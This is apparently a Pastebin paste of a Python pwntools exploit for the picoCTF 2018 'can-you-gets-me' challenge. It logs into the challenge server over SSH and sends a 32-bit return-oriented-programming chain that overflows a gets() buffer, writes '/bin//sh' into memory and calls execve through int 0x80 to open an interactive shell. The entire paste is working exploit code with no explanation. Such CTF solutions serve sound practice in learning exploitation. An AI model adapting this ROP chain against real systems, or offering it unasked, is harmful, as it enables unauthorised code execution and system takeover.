Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- from struct import pack
- remoteShell = ssh(host = '2018shell1.picoctf.com', user=sys.argv[1], password=sys.argv[2])
- remoteShell.set_working_directory('/problems/can-you-gets-me_0_8ac5bddeab74e647cd6d31642246a12a')
- process = remoteShell.process('./gets')
- p = 'A' * 28
- p += pack('<I', 0x0806f02a) # pop edx ; ret
- p += pack('<I', 0x080ea060) # @ .data
- p += pack('<I', 0x080b81c6) # pop eax ; ret
- p += '/bin'
- p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
- p += pack('<I', 0x0806f02a) # pop edx ; ret
- p += pack('<I', 0x080ea064) # @ .data + 4
- p += pack('<I', 0x080b81c6) # pop eax ; ret
- p += '//sh'
- p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
- p += pack('<I', 0x0806f02a) # pop edx ; ret
- p += pack('<I', 0x080ea068) # @ .data + 8
- p += pack('<I', 0x08049303) # xor eax, eax ; ret
- p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
- p += pack('<I', 0x080481c9) # pop ebx ; ret
- p += pack('<I', 0x080ea060) # @ .data
- p += pack('<I', 0x080de955) # pop ecx ; ret
- p += pack('<I', 0x080ea068) # @ .data + 8
- p += pack('<I', 0x0806f02a) # pop edx ; ret
- p += pack('<I', 0x080ea068) # @ .data + 8
- p += pack('<I', 0x08049303) # xor eax, eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0807a86f) # inc eax ; ret
- p += pack('<I', 0x0806cc25) # int 0x80
- process.sendlineafter('!', p)
- process.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement